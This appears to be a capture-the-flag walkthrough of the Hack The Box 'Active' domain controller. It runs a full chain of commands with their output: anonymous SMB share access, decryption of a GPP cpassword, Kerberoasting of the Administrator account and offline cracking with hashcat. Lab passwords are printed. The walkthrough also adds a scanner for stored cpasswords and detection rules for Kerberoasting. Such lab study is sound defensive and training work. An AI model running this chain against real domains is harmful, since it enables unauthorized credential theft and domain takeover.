## Machine Info
Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.
## Host / IP
10.10.10.100 / ACTIVE.HTB. We add the record to our /etc/hosts.
## User

### Reconnaissance
We are going to start by running our nmap scan:
```console
└─$ sudo nmap -sC -sV 10.10.10.100 -T4 -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 23:01 CET
Nmap scan report for 10.10.10.100
Host is up (0.035s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-14 22:01:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-14T22:02:21
|_ start_date: 2026-01-14T21:52:51
```
None of the open ports stands out beyond the standard domain controller set (DNS, Kerberos, LDAP, RPC, SMB), but SMB is always worth checking for shares that allow anonymous access.
### SMB
```console
└─$ smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
smb: \active.htb\policies\> recurse ON
smb: \active.htb\policies\> prompt OFF
smb: \active.htb\policies\> cd ..\
smb: \active.htb\> cd ..\
smb: \> mget *
```
The Replication share is readable anonymously and holds the Policies tree with its Group Policy Preferences content. The file that stands out immediately is Groups.xml.
```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```
We find a username, active.htb\SVC_TGS, and an encrypted password in the cpassword attribute.

**Info:** The cpassword attribute is a well-known weakness of older Group Policy Preferences (GPP): passwords set through GPP were stored in XML files on the domain's SYSVOL share, readable by every domain user, and encrypted with an AES key that Microsoft itself published. MS14-025 stopped new passwords from being set this way, but existing cpassword entries stay in SYSVOL until an administrator removes them.

Known tools decrypt it trivially. Recovering the SVC_TGS password with gpp-decrypt:
```console
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
```

`active.htb\SVC_TGS:GPPstillStandingStrong2k18`
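As an added defensive counterpart to the cpassword finding above (example code, not part of the original writeup): a small audit that walks an exported Policies tree and reports every GPP XML element still carrying a cpassword. The file set and account attribute names are the ones GPP uses; the sample input is the Groups.xml recovered above plus a constructed clean entry.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute names GPP uses for the account a cpassword belongs to (varies by file type).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text: str, source: str = "<memory>") -> list[dict]:
    """Return one finding per element that has a non-empty cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:  # absent or empty: nothing stored on this element
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "cpassword": cpw})
    return findings


def scan_policies(root_dir: str) -> list[dict]:
    """Walk a Policies tree (e.g. the one pulled from the Replication share) for cpasswords."""
    findings = []
    for path in Path(root_dir).rglob("*.xml"):
        if path.name in GPP_FILES:  # utf-8-sig strips the BOM that GPP files usually carry
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings


# Constructed samples: the Groups.xml recovered above, and a clean entry with no password set.
SAMPLE_GROUPS_XML = ('<?xml version="1.0" encoding="utf-8"?>\n'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" '
    'name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>\n</Groups>')
CLEAN_GROUPS_XML = ('<?xml version="1.0" encoding="utf-8"?><Groups><User name="active.htb\\backup">'
    '<Properties action="U" cpassword="" userName="active.htb\\backup"/></User></Groups>')

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: <{f['element']}> account={f['account']} cpassword={f['cpassword'][:12]}...")
```

Run `scan_policies("active.htb/Policies")` against the directory pulled with `mget *` to check the whole tree; a clean domain returns an empty list.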
With the decrypted password we can authenticate to the Users share over SMB and collect the user flag:
```console
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
```
## Root

### Kerberoasting
We have valid domain credentials, so we can run the usual authenticated checks, starting with Kerberoasting: any domain user can request a service ticket for any account that has an SPN, and that ticket is encrypted with the service account's password hash, which can then be attacked offline.
```console
└─$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request -outputfile kerberoast.hashes
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2026-01-14 22:54:00.137757
```
We get a TGS-REP for the Administrator account! The Administrator has an SPN (active/CIFS:445) set, so the service ticket is encrypted with the Administrator's password hash.
```console
└─$ cat kerberoast.hashes
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8acc7e12f80ef3b1e892e5deac4db814$...
```
Then we crack it offline with hashcat, mode 13100 (Kerberos 5 etype 23 TGS-REP), using rockyou with the best66 rule set:
```console
└─$ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt.gz -r /usr/share/hashcat/rules/best66.rule
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...57cad2
Time.Started.....: Wed Jan 14 23:40:47 2026 (16 secs)
Time.Estimated...: Wed Jan 14 23:41:03 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best66.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 45317.8 kH/s (5.41ms) @ Accel:30 Loops:64 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 695654400/946729410 (73.48%)
Rejected.........: 0/695654400 (0.00%)
Restore.Point....: 10521600/14344385 (73.35%)
Restore.Sub.#01..: Salt:0 Amplifier:0-64 Iteration:0-64
Candidate.Engine.: Device Generator
Candidates.#01...: UWM2010 -> n465
Hardware.Mon.#01.: Temp: 55c Util: 43% Core:1965MHz Mem:6000MHz Bus:8
```
Cracked Administrator password:

```console
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8acc7e12f80ef3b1e892e5deac4db814$...:Ticketmaster1968
```
Administrator account pwned. Now we can log in over SMB with these credentials and read root.txt.
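Added example for the detection side of the Kerberoasting step (not part of the original writeup): the TGS request that produced the hash above shows up on the domain controller as Security event 4769, with TicketEncryptionType 0x17 for RC4 (hashcat's etype 23). The records below are constructed and reduced to the fields the rules need; the sweep threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed event 4769 records reduced to the fields the rules use. TicketEncryptionType is
# logged as hex: 0x17 = RC4-HMAC (the etype 23 cracked above), 0x12 = AES256 (modern default).
EVENTS = [
    {"time": "2026-01-14T22:54:00", "account": "svc_tgs@ACTIVE.HTB", "service": "Administrator", "etype": "0x17"},
    {"time": "2026-01-14T22:55:10", "account": "alice@ACTIVE.HTB", "service": "DC$", "etype": "0x12"},
    {"time": "2026-01-14T22:55:12", "account": "alice@ACTIVE.HTB", "service": "http_svc", "etype": "0x12"},
    {"time": "2026-01-14T23:10:00", "account": "bob@ACTIVE.HTB", "service": "sql_svc", "etype": "0x17"},
    {"time": "2026-01-14T23:10:01", "account": "bob@ACTIVE.HTB", "service": "http_svc", "etype": "0x17"},
    {"time": "2026-01-14T23:10:02", "account": "bob@ACTIVE.HTB", "service": "backup_svc", "etype": "0x17"},
]


def is_roastable_service(service: str) -> bool:
    """Machine accounts ('$' suffix) have long random passwords and krbtgt is the KDC itself;
    service tickets for either are normal traffic, not Kerberoast targets."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(events, sweep_threshold: int = 3, window: timedelta = timedelta(minutes=5)):
    """Two rules over 4769 events: any RC4 service ticket for a user-style service account,
    and one requester collecting tickets for many distinct services inside a short window."""
    alerts = []
    per_account = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if not is_roastable_service(ev["service"]):
            continue
        if ev["etype"].lower() == "0x17":
            alerts.append({"rule": "rc4_service_ticket", "account": ev["account"],
                           "service": ev["service"], "time": ev["time"]})
        per_account[ev["account"]].append(ev)
    for account, evs in per_account.items():
        for i, first in enumerate(evs):
            t0 = datetime.fromisoformat(first["time"])
            in_window = {e["service"] for e in evs[i:]
                         if datetime.fromisoformat(e["time"]) - t0 <= window}
            if len(in_window) >= sweep_threshold:
                alerts.append({"rule": "spn_sweep", "account": account,
                               "services": sorted(in_window), "time": first["time"]})
                break  # one sweep alert per account is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(EVENTS):
        print(alert)
```

The lasting fix on the AD side is to give SPN-bearing accounts long random passwords (or gMSAs), remove the SPN from the built-in Administrator, and disable RC4 for service accounts so the first rule alone becomes a high-fidelity signal.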